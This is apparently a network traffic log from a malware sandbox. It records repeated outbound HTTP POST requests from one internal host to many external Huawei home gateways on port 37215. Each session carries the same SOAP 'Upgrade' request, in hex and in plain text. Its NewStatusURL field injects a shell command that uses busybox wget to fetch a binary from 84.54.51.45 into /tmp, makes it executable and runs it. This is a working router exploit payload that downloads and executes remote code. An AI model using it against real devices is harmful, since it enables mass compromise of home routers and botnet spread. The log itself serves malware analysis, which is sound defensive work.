                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            367192.168.2.1552808197.36.240.11037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781810045 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            368192.168.2.1538766197.53.181.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781852961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            369192.168.2.1539680197.216.9.5137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781883001 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            370192.168.2.1532936197.227.172.1637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781919003 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            371192.168.2.1540152197.50.237.21037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781929016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            372192.168.2.1548560197.125.241.12937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781953096 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            373192.168.2.1541318197.8.157.17237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781984091 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            374192.168.2.1544290197.253.122.21137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781991959 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            375192.168.2.1535040197.192.155.8337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782020092 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            376192.168.2.1547914197.74.143.11937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.782044888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
